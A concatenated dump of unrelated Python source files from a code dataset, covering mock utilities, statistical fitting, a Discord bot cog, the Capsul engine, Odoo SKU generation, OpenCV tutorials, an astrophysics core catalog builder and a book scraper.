__check_args(self, args: tuple) -> bool:\n if not isinstance(args, type(self.args)):\n return False\n\n if args is not None:\n if len(args) != len(self.args):\n return False\n\n for index, arg in enumerate(args):\n if isinstance(self.args[index], AnyParameter):\n continue\n\n if arg != self.args[index]:\n return False\n\n return True\n\n def __check_kwargs(self, kwargs: dict) -> bool:\n if not isinstance(kwargs, type(self.kwargs)):\n return False\n\n if kwargs is not None:\n kwargs_keys = set(kwargs.keys())\n original_keys = set(self.kwargs.keys())\n\n if kwargs_keys != original_keys:\n return False\n\n for parameter_name, parameter_value in kwargs:\n if isinstance(self.kwargs.get(parameter_name), AnyParameter):\n continue\n\n if parameter_value != self.kwargs.get(parameter_name):\n return False\n\n return True\n\n def number_of_any_parameters(self) -> int:\n qnt = sum(1 if isinstance(a, AnyParameter) else 0 for a in self.args)\n qnt += sum(1 if isinstance(a, AnyParameter) else 0 for a in self.kwargs.values())\n\n return qnt\n","sub_path":"pythonmock/mock_function_parameters.py","file_name":"mock_function_parameters.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471333879","text":"import logging\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom patsy import dmatrices\nfrom scipy.stats import entropy, poisson\nfrom sklearn.metrics import mean_absolute_error\nfrom statsmodels.formula.api import glm\n\n\ndef fit_distribution(count_col, data, distributions):\n logger = logging.getLogger(__name__)\n\n predicted_df = pd.DataFrame()\n fitted_scores = pd.DataFrame()\n for dist in distributions:\n actual_counts = data[count_col]\n # get predicted counts\n pred_counts, fit_score = get_predicted_counts(actual_counts, dist)\n # test predicted columns\n fit_score['distribution'] = dist\n fitted_scores = fitted_scores.append(fit_score, ignore_index=True)\n # save predicted counts under tsfmed sample method\n predicted_df[dist + \" \" + count_col] = pred_counts\n\n logger.info(f'\\nDistributions sorted by goodness of fit:\\n{\"-\" * 40}')\n logger.info(fitted_scores)\n logger.info('\\n')\n\n return predicted_df\n\n\ndef get_predicted_counts(data, dist):\n \"\"\"Fit distribution\"\"\"\n col_name = data.name.replace(' ', '_').replace('/', '_')\n data = data.rename(col_name)\n\n expr = '{cc} ~ {cc}'.format(cc=col_name)\n\n def get_alpha_value(count, data):\n poisson_model = glm(expr, data=data, family=sm.families.Poisson()).fit()\n data['BB_LAMBDA'] = poisson_model.mu # lambda value\n\n data['AUX_OLS_DEP'] = data.apply(lambda x: ((x[count] - x['BB_LAMBDA']) ** 2 - x[\n count]) / x['BB_LAMBDA'], axis=1)\n ols_expr = \"\"\"AUX_OLS_DEP ~ BB_LAMBDA - 1\"\"\"\n aux_olsr_results = smf.ols(ols_expr, data).fit()\n\n return aux_olsr_results.params[0]\n\n # Get data\n data_ = data.to_frame()\n y, actual_counts = dmatrices(expr, data=data_, return_type='dataframe')\n\n # Instantiate model\n if 'zinflate poisson' in dist:\n model = sm.ZeroInflatedPoisson(y, actual_counts, inflation='logit')\n # model = reg_model.ZeroInflatedPoisson(y, x, x, inflation='logit')\n else:\n if 'nbinom' in dist:\n alpha = get_alpha_value(col_name, data_)\n distribution = sm.families.NegativeBinomial(alpha=alpha)\n elif 'poisson' in dist:\n distribution = sm.families.Poisson()\n\n model = glm(expr, data=data_, family=distribution)\n\n # Fit the model\n try:\n if 'qpoisson' in dist:\n model = model.fit(cov_type='HC1')\n else:\n model = model.fit(maxiter=50)\n except:\n model = model.fit(method='nm')\n\n # Predict the data\n try:\n predicted = model.get_prediction(actual_counts)\n predicted_counts = predicted.summary_frame()['mean']\n except:\n try:\n predicted_counts = model.predict(actual_counts)\n except:\n zip_mean_pred = model.predict(actual_counts,\n exog_infl=np.ones((len(actual_counts), 1)))\n predicted_counts = poisson.ppf(q=0.95, mu=zip_mean_pred)\n\n # test fit scores\n fit_scores = test_goodness_fit(data, predicted_counts, model)\n\n return predicted_counts, fit_scores\n\n\ndef test_goodness_fit(actual_counts, predicted_counts, model):\n try:\n kl_div = kl_divergence(actual_counts, predicted_counts)\n mae = mean_absolute_error(actual_counts, predicted_counts)\n pchi = model.pearson_chi2\n dev = model.deviance\n st_sig = 268.531 < pchi\n\n return {'kl div': kl_div, \"mae\": mae, 'pearson chi2': pchi, 'deviance': dev,\n 'statistically significant': st_sig}\n except:\n return {'kl div': kl_div, \"mae\": mae}\n\n\ndef print_stats(data):\n def get_confidence_limit(stats):\n alpha = 0.95\n p = ((1.0 - alpha) / 2.0) * 100\n lower = max(0.0, np.percentile(stats, p))\n p = (alpha + ((1.0 - alpha) / 2.0)) * 100\n upper = min(100.0, np.percentile(stats, p))\n return alpha * 100, lower, upper\n\n print(f'COUNT: {len(data)}')\n print(f'AVG: {np.mean(data)}')\n print(f'MEDIAN: {np.median(data)}')\n print(f'STD DEV: {np.std(data)}')\n print(f'VAR: {np.var(data)}')\n print('%.1f confidence interval %.2f%% and %.2f%%\\n' % (get_confidence_limit(data)))\n\n\ndef plot_distribution(data, verbose=True):\n fig, (ax_box, ax_hist) = plt.subplots(2, sharex=True,\n gridspec_kw={\"height_ratios\": (0.2, 1)})\n\n mean = np.mean(data)\n median = np.median(data)\n\n # boxplot\n sns.boxplot(data, ax=ax_box)\n ax_box.axvline(mean, color='r', linestyle='--')\n ax_box.axvline(median, color='g', linestyle='-')\n\n sns.distplot(data, kde=False, ax=ax_hist)\n ax_hist.axvline(mean, color='r', linestyle='--')\n ax_hist.axvline(median, color='g', linestyle='-')\n\n plt.legend({'Mean': mean, 'Median': median})\n if verbose:\n print_stats(data)\n plt.show()\n\n\ndef kl_divergence(p, q):\n eps = 0.01\n pp = p + eps\n pp /= sum(pp)\n\n qq = q + eps\n qq /= sum(qq)\n kl_div = entropy(pp, qq, base=10.)\n return kl_div\n","sub_path":"validate_exp/transform_data.py","file_name":"transform_data.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221112666","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2020 MyerFire\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\n\r\nimport datetime\r\nimport discord\r\nimport humanfriendly\r\nfrom discord.ext import commands\r\n\r\nimport core.static.static\r\n\r\n\r\nclass Guild(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command(name=\"guild\", aliases=[\"g\", \"server\"])\r\n @commands.max_concurrency(1, per=commands.BucketType.user)\r\n async def guild(self, ctx: commands.Context):\r\n guild_embed = discord.Embed(\r\n color=ctx.guild.owner.color,\r\n timestamp=ctx.message.created_at\r\n ).set_author(\r\n name=f\"{ctx.guild.name} ({ctx.guild.id})\",\r\n icon_url=str(ctx.guild.icon_url_as(static_format=\"png\", size=2048))\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Owner**__\",\r\n value=f\"{ctx.guild.owner.mention} ({ctx.guild.owner.id})\"\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Creation Date**__\",\r\n value=f\"{ctx.guild.created_at.strftime(ctx.bot.CREATION_TIME_FORMAT)} ({humanfriendly.format_timespan(datetime.datetime.now() - ctx.guild.created_at)} ago)\",\r\n inline=False\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Channels ({len(await get_pure_channels(ctx.guild.channels))})**__\",\r\n value=f\"({len(ctx.guild.text_channels)} text and {len(ctx.guild.voice_channels)} voice)\",\r\n inline=False\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Members**__\",\r\n value=f\"{ctx.guild.member_count:,d}\",\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Emoji**__\",\r\n value=f\"{len(ctx.guild.emojis):,d}\"\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Roles ({(len(ctx.guild.roles) - 1):,d})**__\", # @everyone\r\n # role doesn't count\r\n value=f\"{await core.static.static.get_role_mentions_string(await core.static.static.get_role_mentions(ctx.guild.roles))}\",\r\n inline=False\r\n )\r\n await ctx.send(embed=guild_embed)\r\n\r\n\r\nasync def get_pure_channels(channels) -> list:\r\n for channel in channels:\r\n if isinstance(channel, discord.CategoryChannel):\r\n channels.remove(channel)\r\n return channels\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Guild(bot))\r\n print(\"Reloaded commands.guild\")","sub_path":"commands/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410722626","text":"'''\nThis module defines the main API to interact with Capsul processes.\nIn order to execute a process, it is mandatory to have an instance of\n:py:class:`Platform`. Such an instance can be created with constructor\nor by using a JSON representation of the instance (created by \n:py:meth:`Platform.to_json`) with\n:py:func:`soma.serialization.from_json`\n'''\nimport sys\nimport json\nimport os.path as osp\nimport re\n\nfrom traits.api import Undefined\n\nfrom soma.controller import Controller\nfrom soma.serialization import to_json, from_json\n\nfrom .database_json import JSONDBEngine\nfrom .execution_context import ExecutionContext\n\nfrom capsul.study_config.study_config import StudyConfig\n\nclass CapsulEngine(Controller):\n default_modules = ['capsul.engine.module.spm',\n 'capsul.engine.module.fsl']\n \n def __init__(self, \n database_location,\n database,\n config=None):\n '''\n CapsulEngine constructor should not be called directly.\n Use engine() factory function instead.\n '''\n super(CapsulEngine, self).__init__()\n \n self._database_location = database_location\n self._database = database\n\n self.study_config = StudyConfig()\n \n db_config = database.json_value('config')\n self.modules = database.json_value('modules')\n if self.modules is None:\n self.modules = self.default_modules\n self.load_modules()\n \n execution_context = from_json(database.json_value('execution_context'))\n if execution_context is None:\n execution_context = ExecutionContext()\n self._execution_context = execution_context\n \n self._processing_engine = from_json(database.json_value('processing_engine')) \n self._metadata_engine = from_json(database.json_value('metadata_engine'))\n \n for cfg in (db_config, config):\n if cfg:\n for n, v in cfg.items():\n if isinstance(v, dict):\n o = getattr(self, n)\n if isinstance(o, Controller):\n o.import_from_dict(v)\n continue\n setattr(self, n, v)\n\n self.init_modules()\n\n @property\n def database(self):\n return self._database\n\n @property\n def database_location(self):\n return self._database_location\n \n @property\n def execution_context(self):\n return self._execution_context\n\n @execution_context.setter\n def execution_context(self, execution_context):\n self._execution_context = execution_context\n \n @property\n def processing_engine(self):\n return self._processing_engine\n \n \n @property\n def metadata_engine(self):\n return self._metadata_engine\n \n @metadata_engine.setter\n def metadata_engine(self, metadata_engine):\n self._metadata_engine = metadata_engine\n self.database.set_json_value('metadata_engine', \n to_json(self._metadata_engine))\n \n def load_modules(self):\n if self.modules is None:\n modules = self.default_modules\n else:\n modules = self.modules\n \n self._loaded_modules = {}\n for module in modules:\n self.load_module(module)\n \n def load_module(self, module):\n if module not in self._loaded_modules:\n __import__(module)\n python_module = sys.modules.get(module)\n if python_module is None:\n raise ValueError('Cannot find %s in Python modules' % module)\n loader = getattr(python_module, 'load_module', None)\n if loader is None:\n raise ValueError('No function load_module() defined in %s' % module)\n self._loaded_modules[module] = loader(self, module)\n return True\n return False\n \n def init_modules(self):\n if self.modules is None:\n modules = self.default_modules\n else:\n modules = self.modules\n for module in modules:\n self.init_module(module)\n \n def init_module(self, module):\n python_module = sys.modules.get(module)\n if python_module is None:\n raise ValueError('Cannot find %s in Python modules' % module)\n initializer = getattr(python_module, 'init_module', None)\n if initializer is None:\n raise ValueError('No function init_module() defined in %s' % module)\n initializer(self, module, self._loaded_modules[module])\n \n def save(self):\n self.database.set_json_value('execution_context', \n to_json(self._execution_context))\n if self._processing_engine:\n self.database.set_json_value('processing_engine', \n to_json(self._processing_engine))\n if self._metadata_engine:\n self.database.set_json_value('metadata_engine', \n to_json(self._metadata_engine))\n config = {}\n for n in self.user_traits().keys():\n v = getattr(self, n)\n if v is Undefined:\n continue\n if isinstance(v, Controller):\n v = v.export_to_dict(exclude_undefined=True)\n if not v:\n continue\n config[n] = v\n self.database.set_json_value('config', config)\n self.database.commit()\n \n \n #\n # Method imported from self.database\n #\n def set_named_directory(self, name, path):\n return self.database.set_named_directory(name, path)\n \n def named_directory(self, name):\n return self.database.named_directory(name)\n \n def named_directories(self):\n return self.database.set_named_directories()\n \n \n def set_json_value(self, name, json_value):\n return self.database.set_json_value(name, json_value)\n\n def json_value(self, name):\n return self.database.json_value(name)\n \n \n def set_path_metadata(self, path, metadata, named_directory=None):\n return self.database.set_path_metadata(name, path, metadata, named_directory)\n \n def path_metadata(self, path, named_directory=None):\n return self.database.set_path_metadata(name, path, named_directory)\n\n\n\n def get_process_instance(self, process_or_id, **kwargs):\n '''\n The supported way to get a process instance is to use this method.\n For now, it simply calls self.study_config.get_process_instance\n but it will change in the future.\n '''\n instance = self.study_config.get_process_instance(process_or_id,\n **kwargs)\n return instance\n\n\n_populsedb_url_re = re.compile(r'^\\w+(\\+\\w+)?://(.*)')\ndef database_factory(database_location):\n global _populsedb_url_re \n \n engine = None\n engine_directory = None\n\n if database_location.endswith('.json'):\n engine_directory = osp.abspath(osp.dirname(database_location))\n engine = JSONDBEngine(database_location)\n else:\n match = _populsedb_url_re.match(database_location)\n if match:\n path = match.groups(2)\n _, path = osp.splitdrive(path)\n if path.startswith(os.apth.sep):\n engine_directory = osp.abspath(osp.dirname(path))\n populse_db = database_location\n elif database_location.endswith('.sqlite'):\n populse_db = 'sqlite:///%s' % database_location\n engine_directory = osp.abspath(osp.dirname(database_location))\n elif database_location == ':memory:':\n populse_db = 'sqlite:///:memory:'\n else:\n raise ValueError('Invalid database location: %s' % database_location)\n \n # Import populse_db related module only\n # if used in order to add a mandatory\n # dependency on the project\n from .database_populse import PopulseDBEngine\n engine = PopulseDBEngine(populse_db)\n if engine_directory:\n engine.set_named_directory('capsul_engine', engine_directory)\n return engine\n\ndef capsul_engine(database_location=None, config=None):\n '''\n User facrory for creating capsul engines\n '''\n if database_location is None:\n database_location = osp.expanduser('~/.config/capsul/capsul_engine.json')\n database = database_factory(database_location)\n capsul_engine = CapsulEngine(database_location, database, config=config)\n return capsul_engine\n \n","sub_path":"capsul/engine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197423266","text":"# -*- encoding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\nfrom odoo.exceptions import UserError\nimport datetime, string\n\nclass IrSequence(models.Model):\n _inherit = \"ir.sequence\"\n\n next_sku = fields.Char(string=u'next SKU')\n\n @api.model\n def get_seller_sku(self):\n '''生成seller sku 10位 6位日期+4位字母 一天最多可生成456796'''\n record = self.search([('code', '=', 'sku_seq')], limit=1)\n sku = record.next_sku\n current_sku = sku[6:]\n if current_sku == 'ZZZZ':\n raise UserError(u'今日的seller sku数量达到上限!')\n now_time = datetime.datetime.now() + datetime.timedelta(hours=8)\n date_str = now_time.strftime('%y%m%d')\n if date_str == sku[:6]:\n uppercases = [word for word in string.uppercase]\n current_sku_list = [word for word in current_sku]\n reverse_seq = current_sku_list[::-1]\n for i in range(len(reverse_seq)):\n index = uppercases.index(reverse_seq[i])\n if index == 25:\n reverse_seq[i] = 'A'\n else:\n reverse_seq[i] = uppercases[index + 1]\n break\n next_seq = ''\n for word in reverse_seq:\n next_seq = word + next_seq\n record.next_sku = date_str + next_seq\n else:\n record.next_sku = date_str + 'AAAB'\n return date_str + 'AAAA'\n return sku\n\n\n","sub_path":"HZMX/amazon_api/models/ir_sequence.py","file_name":"ir_sequence.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560090377","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 5 15:43:00 2018\n\n@author: admin\n\"\"\"\n\n\nimport os\nimport pandas as pd\nimport numpy as np\ndfs=dict()\ndts=[x[0:8] for x in os.listdir(\"./div\")]\nsyms=list()\nfor dt in dts:\n dfs[dt]=pd.read_csv(f\"./div/{dt}.csv\",index_col=0)\n syms=list(set(syms+list(dfs[dt].index)))\n\nind=dict()\ndfi=dict()\nfor i in [\"Adj\"+j for j in ['Open','Close','PreClose']]:\n ind[i]=dict()\n for dt in dts:\n ind[i][dt]=dfs[dt][i].T\n dfi[i]=pd.DataFrame(ind[i])\n dfi[i].fillna(method='backfill',inplace=True)\n dfi[i].fillna(method='bfill',inplace=True)\nclose_close=dfi['AdjClose']-dfi['AdjPreClose']\nclose_close[np.isinf(close_close)]=0\ninter=close_close.mean().mean()\n\nopen_close=(dfi['AdjClose']-dfi['AdjOpen'])/(dfi['AdjClose']-dfi['AdjPreClose'])\nopen_close[np.isinf(open_close)]=0\ninter=open_close.mean().mean()\n\npclose_open=(dfi['AdjOpen']-dfi['AdjPreClose'])/(dfi['AdjClose']-dfi['AdjPreClose'])\npclose_open[np.isinf(pclose_open)]=0\novernight=pclose_open.mean().mean()\n\no_c_corr=open_close.T.corr()\npc_o_corr=pclose_open.T.corr()\nc_c_corr=close_close.T.corr()\nsh6_cc=c_c_corr['SH600000']\nsh6_oc=o_c_corr['SH600000']\nsh6_pco=pc_o_corr['SH600000']\n\n\n'''\n日内涨跌和日间涨跌的相关性差别之大是令人震惊的\n'''\n\n'''\n每天一个df 存到大dict中\n交易日index\n对于每个指标 生成相应的序列 合并到指标对应的df中\n看效果如何\n'''\n\n'''\n日期\n股票名\n行业名\n行业内排序\n贝塔值\n'''","sub_path":"ind/corr_daily.py","file_name":"corr_daily.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252724702","text":"# created by RomaOkorosso at 21.03.2021\n# book_methods.py\n\nfrom datetime import datetime, timedelta, date\nfrom typing import Optional\nfrom Models.models import Book, TakenBook\nfrom Models import schemas\nfrom sqlalchemy.orm import Session\nfrom Database.exceptions import *\nfrom pydantic import ValidationError\n\n\nclass BookMethods:\n\n @staticmethod\n def add_book(db: Session, add_book: schemas.AddBook):\n new_book = Book(**add_book.dict())\n db.add(new_book)\n db.commit()\n return new_book\n\n @staticmethod\n def get_book(db: Session, book_id: int):\n try:\n book = db.query(Book).filter(Book.id == book_id).first()\n except Exception as err:\n print(err)\n else:\n if book is None:\n raise ItemNotFound(f\"No such book id: {book_id} in database\")\n return book\n\n @staticmethod\n def update_book(db: Session, update_book: schemas.Book):\n try:\n book = BookMethods.get_book(db, update_book.id)\n except ItemNotFound as err:\n print(err)\n else:\n for key, value in update_book.__dict__.iteritems():\n setattr(book, key, value)\n db.commit()\n\n @staticmethod\n def add_book_to_taken(db: Session, taken_book: schemas.TakenBook):\n to_add_taken_book = TakenBook(**taken_book.dict())\n db.add(to_add_taken_book)\n db.commit()\n\n @staticmethod\n def get_taken_book_by_id(db: Session, taken_book_id: int):\n try:\n taken_book = db.query(TakenBook).filter(TakenBook.id == taken_book_id).first()\n except Exception as err:\n print(err)\n else:\n if taken_book is None:\n raise ItemNotFound(f\"No such taken_book id: {taken_book_id} in database\")\n return taken_book\n\n @staticmethod\n def get_taken_book_by_client_and_book(db: Session, book_id: int, client_id: int):\n try:\n taken_book = db.query(TakenBook).filter(\n TakenBook.book_id == book_id and TakenBook.client_id == client_id).first()\n except Exception as err:\n print(err)\n else:\n if taken_book is None:\n raise ItemNotFound(f\"No such taken_book in database\")\n return taken_book\n\n @staticmethod\n def update_taken_book(db: Session, taken_book_update: schemas.TakenBook):\n try:\n taken_book: TakenBook = BookMethods.get_taken_book_by_id(db, taken_book_update.id)\n except ItemNotFound as err:\n print(err)\n else:\n\n for key, value in dict(taken_book_update).iteritems():\n setattr(taken_book, key, value)\n db.commit()\n\n @staticmethod\n def return_book(db: Session, taken_book_id: int):\n taken_book: TakenBook = BookMethods.get_taken_book_by_id(db, taken_book_id)\n taken_book.return_date = datetime.now().date()","sub_path":"Database/book_methods.py","file_name":"book_methods.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479588967","text":"from igdb.wrapper import IGDBWrapper\nimport config\n\nwrapper = IGDBWrapper(config.CLIENT_ID, config.ACCESS_TOKEN)\n\nbyte_array = wrapper.api_request(\n 'games',\n 'fields cover, name, artworks ; search \"Cyberpunk 2077\";'\n)\n\ncover_data = wrapper.api_request(\n 'covers',\n 'fields game, image_id; where id = 70754;'\n)\n\nartwork_data = wrapper.api_request(\n 'artworks',\n 'fields url; where id = (4940, 4941, 4942,4943,5034,5035,5036,5037,4940,5673,5674,8066,8743);'\n)\n\nprint(byte_array)\nprint(cover_data)\nprint(artwork_data)","sub_path":"download_cover_art.py","file_name":"download_cover_art.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165447988","text":"#阈值与平滑处理\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n#图像阈值\n'''\nret,dst = cv2.threshold(src,thresh,maxval,type)\nsrc:输入图,只能输入单通道图像,通常来说为灰度图\ndst:输出图\nthresh:阈值\nmaxval:当像素值超过了阈值(或者小于阈值,根据type决定),所赋予的值\ntype:二值化操作的类型,包含以下5种类型:\ncv2.THRESH_BINARY 超过阈值部分去maxval(最大值),否则取0\ncv2.THRESH_BINARY_INV THRESH_BINARY的反转\ncv2.THRESH_TRUNC 大于阈值的部分设为阈值,否则不变\ncv2.THRESH_TOZERO 大于阈值部分不改变,否则设为0\ncv2.THRESH_TOZERO_INV THRESH_TOZERO的反转\n'''\nimg = cv2.imread('cat.jpg')\nimg_gray = cv2.imread('cat.jpg',cv2.IMREAD_GRAYSCALE)\nret,thresh1 = cv2.threshold(img_gray,127,255,cv2.THRESH_BINARY )\nret,thresh2 = cv2.threshold(img_gray,127,255,cv2.THRESH_BINARY_INV )\nret,thresh3 = cv2.threshold(img_gray,127,255,cv2.THRESH_TRUNC )\nret,thresh4 = cv2.threshold(img_gray,127,255,cv2.THRESH_TOZERO )\nret,thresh5 = cv2.threshold(img_gray,127,255,cv2.THRESH_TOZERO_INV )\n\ntitle = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']\nimages = [img,thresh1,thresh2,thresh3,thresh4,thresh5]\n\nfor i in range(6):\n plt.subplot(2,3,i+1),plt.imshow(images[i],'gray')\n plt.title(title[i])\n plt.xticks([]),plt.yticks([])\n ''' \n xsticks与yticks:指定坐标轴的刻度\n xticks(ticks, [labels], **kwargs) icks : \n array_like\n 应该放置刻度的位置列表。您可以传递一个空列表来禁用xticks。\n labels : array_like,可选\n 要放置在给定位置的显式标签列表。\n ** kwargs\n Text 属性可用于控制标签的外观。\n linspace(start, stop, num, endpoint, retstep, dtype)\n start:开始值\n stop:终值\n num:元素个数,默认值50。可选参数\n endpoint : 如果是为 True,包括终值stop。默认值为 True。可选参数\n retstep : 如果为True,返回 (`samples`, `step`),step表示 samples之间的间距。可选参数\n dtype : 输出数组的数据类型.。如果 `dtype` 没有给定,参照其他输入的数据类型。可选参数\n '''\nplt.show()\n\n\n#平滑处理\nimg1 = cv2.imread('lenaNoise.png')\ncv2.imshow('img1',img1)\n\n#均值滤波\n'''\n均值滤波:设定一个矩阵,对以点为中心所在的3X3矩阵做内积,然后再除以数的个数(9个),得到均值赋予为该点的像素值\n'''\n#简单的平均卷积操作\nblur = cv2.blur(img1,(3,3))#(3,3)表示卷积盒\ncv2.imshow('blur',blur)\n\n#方框滤波\n#基本和均值一样,可以选择归一化\nbox = cv2.boxFilter(img1,-1,(3,3),normalize=True)#-1指得到的结果在颜色通道上是一致的,就是求完平均后每个矩阵点上都是那个平均值\n#normalize:当为True时,与均值一样(在求完和后除以9),为False时,只求和然后赋值,此情况容易越界如果大于255就全部赋予255,故图像会大部分为白色\ncv2.imshow('box',box)\n\n#高斯滤波\n'''\n高斯函数:越接近指定值(x)时,输出值(y)越大,运用于图像处理时可以这样理解:在矩阵求和得均值时加以权重,指定值即中间值得权重设为1(最大),与中间值相差越大给与权重越小\n'''\n#高斯模糊的卷积核里的数值是满足高斯分布的,相当于更重视中间的\naussian = cv2.GaussianBlur(img1,(5,5),1)#1是设定矩阵(高斯核)x方向的标准差为1即标准正态分布\ncv2.imshow('aussian',aussian)\n\n#中值滤波 处理效果比较明显的方法\n#将矩阵内的所有像素值从小到大排列取中值,用中值代替\nmedian = cv2.medianBlur(img1,5)#5就相当于(5,5),在medianBlur函数内只写方阵故只写一个\ncv2.imshow('median',median)\n\n#显示所有的\nres = np.hstack((blur,aussian,median))#hstack函数可以将元组内的数据横向排列起来,vstack就是竖向拼接\nprint(res)\ncv2.imshow('median vs average',res)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"opencv/Class/class2/class2.py","file_name":"class2.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131264127","text":"''' CHANGES\n- many_to_one: verbose=True, assert_x0_unique=False, assert_x1_in_x0=False\n- save_cc_prev\n- h5distread\n- resumeStep\n- verbose/timekeeping\n- useGPU, intersect1d and many-to-one\n'''\nfrom __future__ import division\nimport numpy as np\nimport subhalo_mass_loss_model_LastJourney as SHMLM\nfrom itk import h5_write_dict, h5_read_dict, many_to_one, many_to_one_GPU, intersect1d_GPU\nfrom tqdm import tqdm # progress bar\nimport os\nimport glob\nimport time\n\ncc_data_dir = SHMLM.cc_data_dir\ncc_output_dir = SHMLM.cc_output_dir\n\nA, zeta = SHMLM.AFID, SHMLM.ZETAFID\n\nsteps = SHMLM.steps\n\nvars_cc_all = [\n 'fof_halo_tag',\n 'core_tag',\n 'tree_node_index',\n 'infall_tree_node_mass',\n 'central',\n 'host_core'\n]\nvars_cc_min = [\n 'core_tag',\n 'tree_node_index',\n 'infall_tree_node_mass',\n 'central',\n 'host_core'\n]\n\ndef vars_cc(step):\n if step==499 or step==247:\n return vars_cc_all\n else:\n return vars_cc_min\n\ndef fname_cc(step, mode):\n if mode == 'input':\n return cc_data_dir + 'm000p-{}'.format(step)\n elif mode == 'output':\n return cc_output_dir + 'm000p-{}.corepropertiesextend.hdf5'.format(step)\n elif mode=='output_ccprev':\n return cc_output_dir + 'm000p-{}.ccprev.hdf5'.format(step)\n\ndef h5distread(step):\n basename = fname_cc(step, 'input')\n ccall = {k:[] for k in vars_cc_min}\n for f in glob.glob(basename+'#*'):\n ccf = h5_read_dict(f)\n for k in vars_cc_min:\n ccall[k].append(ccf[k])\n return { k:np.concatenate(ccall[k]) for k in vars_cc_min }\n\ndef m_evolved_col(A, zeta, next=False):\n if next:\n return 'next_m_evolved_{}_{}'.format(A, zeta)\n else:\n return 'm_evolved_{}_{}'.format(A, zeta)\n\ndef create_core_catalog_mevolved(writeOutputFlag=True, useLocalHost=False, save_cc_prev=False, resumeStep=None, useGPU=False):\n \"\"\"\n Appends mevolved to core catalog and saves output in HDF5.\n Works by computing mevolved for step+1 at each step and saving that in memory.\n \"\"\"\n if writeOutputFlag:\n print('Reading data from {} and writing output to {}'.format(cc_data_dir, cc_output_dir))\n cc = {}\n cc_prev = {}\n\n for step in tqdm(steps):\n # Start at step `resumeStep`. Assumes code finished running and saved ccprev for step `resumeStep-1`.\n if resumeStep is not None:\n if step p')\n if product_description:\n product_description = product_description.get_text(strip=True)\n else:\n product_description = ''\n # get the upc and assign it to the book\n upc = page.select('.product_page table td')[0].get_text(strip=True)\n # return final book data\n book_data = {\n 'category': category.id,\n 'title': title,\n 'thumbnail_url': book_dict['thumbnail_url'],\n 'price': price,\n 'stock': stock,\n 'product_description': product_description,\n 'upc': upc,\n }\n return book_data\n\n\ndef save_books_on_database(book_data_list):\n \"\"\"\n book_data_list: list or arrays describing books to be saved\n example of book_data_list:\n {\n 'category': 3954,\n 'title': 'Tipping the Velvet',\n 'thumbnail_url': 'http://books.toscrape.com/media/cache/26/0c/ddd9f4a1c.jpg',\n 'price': '£53.74',\n 'stock': True,\n 'product_description': 'Through a friend at the box office, ...',\n 'upc': '90fa61229261140a'\n }\n\n note: models are not saved in parallel to prevent sqlite from exploding\n django.db.utils.OperationalError: database is locked\n \"\"\"\n for book_data in book_data_list:\n category_id = book_data.pop('category')\n category = models.Category.objects.get(id=category_id)\n models.Book.objects.create(category=category, **book_data)\n","sub_path":"techk/apps/scraper/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 